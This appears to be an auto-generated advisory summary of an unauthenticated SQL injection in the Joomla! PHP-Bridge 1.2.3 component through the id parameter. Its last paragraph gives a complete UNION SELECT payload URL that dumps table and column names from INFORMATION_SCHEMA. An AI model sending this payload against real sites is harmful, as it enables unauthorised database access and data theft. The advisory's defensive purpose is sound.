Joomla! Component PHP-Bridge 1.2.3 SQL Injection via id Parameter

An unauthenticated attacker sends a GET request to `index.php` with `option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail` and injects SQL code via the `id` parameter [ref_id=1]. The payload uses `UNION SELECT` with `EXPORT_SET` functions to extract database schema information such as table and column names from `INFORMATION_SCHEMA.COLUMNS` [ref_id=1]. No authentication or special privileges are required.

The vulnerable component is `com_phpbridge` in Joomla! PHP-Bridge version 1.2.3 [ref_id=1]. The exploit targets the `index.php` entry point with `option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]` [ref_id=1]. The specific file or function that fails to sanitize the `id` parameter is not named in the bundle.

No patch is included in the bundle. The advisory [ref_id=1] only provides the exploit proof-of-concept; no vendor fix or remediation commit is documented. The recommended mitigation would be to sanitize the `id` parameter as an integer or to use parameterized queries, but the bundle does not specify any official fix.

Send a GET request to `http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=-00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-` [ref_id=1].